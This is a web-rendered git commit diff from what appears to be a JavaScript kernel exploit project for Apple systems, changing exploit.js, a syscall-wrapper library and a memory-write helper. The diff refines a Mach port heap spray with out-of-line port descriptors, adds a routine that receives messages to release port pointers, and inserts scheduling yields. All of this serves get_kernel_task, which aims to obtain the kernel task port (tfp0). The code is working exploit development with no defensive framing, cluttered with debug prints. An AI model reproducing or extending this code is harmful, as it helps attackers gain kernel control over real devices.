summaryrefslogtreecommitdiff
path: root/src
diff options
context:
space:
mode:
Diffstat (limited to 'src')
-rwxr-xr-xsrc/js/kexp/exploit.js60
-rwxr-xr-xsrc/js/lib/myutils.js4
-rw-r--r--src/js/primitives/mem.js2
3 files changed, 53 insertions, 13 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e0ef574..22f68ca 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -26,8 +26,10 @@ var req_head_msgh_reply_port = 0xc;
var req_head_msgh_id = 0x14;
var req_msgh_body_msgh_descriptor_count = 0x18;
var MACH_MSG_OOL_PORTS_DESCRIPTOR = 0x2;
-var req_init_port_set_address = 0x0
-var req_init_port_set_count = 0x4
+var req_init_port_set_address = 0x0;
+var req_init_port_set_count = 0x4;
+var MACH_RCV_MSG = 0x2;
+var MACH_MSG_TIMEOUT_NONE = 0;
var task_self = 0;
var kslide = 0;
@@ -181,7 +183,7 @@ function spray(dict, size, port) {
var kp = 0;
function spray_ports(number_port_descs) {
- printf("spray_ports %d\n", number_port_descs);
+// printf("spray_ports %d\n", number_port_descs);
if (kp == 0) {
kp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, kp);
@@ -191,11 +193,12 @@ function spray_ports(number_port_descs) {
var mp = malloc(4);
mach_port_allocate(task_self, MACH_PORT_RIGHT_RECEIVE, mp);
- var rmp = read_u32(mp);
- mach_port_insert_right(task_self, rmp, rmp, MACH_MSG_TYPE_MAKE_SEND);
+ mach_port_insert_right(task_self, read_u32(mp), read_u32(mp), MACH_MSG_TYPE_MAKE_SEND);
- send_ports(rmp, read_u32(kp), 2, number_port_descs);
- return mp;
+ send_ports(read_u32(mp), read_u32(kp), 2, number_port_descs);
+ var ret = read_u32(mp);
+ free(mp);
+ return ret;
}
function fast_log2(n) {
@@ -242,8 +245,10 @@ function send_ports(target, payload, num, number_port_descs) {
new_buf_.push(tmp[3]);
new_buf_.push(0);
new_buf_.push(0);
- new_buf_.push(19);
new_buf_.push(MACH_MSG_OOL_PORTS_DESCRIPTOR);
+ new_buf_.push(19);
+
+// printf("%x 0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,0x%08x,\n", new_buf_.length, new_buf_[zz]]);
var new_buf = fast_array_mul(new_buf_, number_port_descs);
@@ -267,11 +272,27 @@ function send_ports(target, payload, num, number_port_descs) {
free(buf);
- printf("%d %s\n", ret, mach_error_string(ret));
-
return ret;
}
+function release_port_ptrs(port) {
+ printf("alive\n");
+ var req = malloc(0x1c + (5 * 0xc) + 0x8);
+ for (var i = 0; i < (0x1c + (5 * 0xc) + 0x8); i += 4) {
+ write_u32(req + i, 0x0);
+ }
+ printf("%s\n", hexdump(read_buf(req, 0x1c + (5 * 0xc) + 0x8), 8, 2, req, 8, "0"));
+ printf("alive\n");
+ var ret = mach_msg(req, MACH_RCV_MSG, 0, (0x1c + (5 * 0xc) + 0x8), port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
+ printf("alive\n");
+ // if (ret != KERN_SUCCESS) {
+ printf("mach_recv %d %s\n", ret, mach_error_string(ret));
+ printf("alive\n");
+ // }
+ free(req);
+ printf("alive\n");
+}
+
function get_kernel_task() {
var ret = 0;
var tfp0 = 0;
@@ -318,17 +339,36 @@ function get_kernel_task() {
prepare_ptr(big_buf, big_size, kptr, 256);
prepare_ptr(small_buf, small_size, kptr, 32);
+ sched_yield();
for (var i = 0; i < PORTS_NUM_PRESPRAY; i++) {
var dummy = malloc(4);
spray(big_buf, big_size, dummy);
}
+ sched_yield();
for (var i = 0; i < PORTS_NUM; i++) {
write_u32(fp + (i << 2), spray_ports(i));
var dummy = malloc(4);
spray(small_buf, small_size, dummy);
}
+ sched_yield();
+ for (var i = 0; i < PORTS_NUM; i++) {
+ printf("test\n");
+ printf("test1\n");
+ printf("test2\n");
+ printf("test3\n");
+ printf("test4\n");
+ printf("test5\n");
+ printf("test6\n");
+ printf("test7\n");
+ printf("test8\n");
+ printf("test9\n");
+ printf("test10\n");
+ release_port_ptrs(read_u32(fp + (i << 2)));
+ printf("test11\n");
+ }
+
printf("get lucky\n");
return tfp0;
diff --git a/src/js/lib/myutils.js b/src/js/lib/myutils.js
index 325c490..e856624 100755
--- a/src/js/lib/myutils.js
+++ b/src/js/lib/myutils.js
@@ -95,8 +95,8 @@ var strlen = scall_wrapper("strlen");
var mach_task_self = scall_wrapper("mach_task_self");
var mach_thread_self = scall_wrapper("mach_thread_self");
var malloc = scall_wrapper("malloc");
-var mach_port_allocate = scall_wrapper("malloc");
-var mach_port_insert_right = scall_wrapper("malloc");
+var mach_port_allocate = scall_wrapper("mach_port_allocate");
+var mach_port_insert_right = scall_wrapper("mach_port_insert_right");
var mach_port_set_attributes = scall_wrapper("mach_port_set_attributes");
var usleep = scall_wrapper("usleep");
var sched_yield = scall_wrapper("sched_yield");
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index ff12fdd..f6c4fe7 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -92,7 +92,7 @@ function write_u32_buf(addy, buf, len) {
}
function fast_write_buf(addy, buf) {
- var upper_i = Math.floor(buf.length / 0x100);
+ var upper_i = Math.ceil(buf.length / 0x100);
for (var i = 0; i < upper_i; i++) {
u8x4 = u32_to_u8x4(addy + (i * 0x100));
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 23:19:42 +0000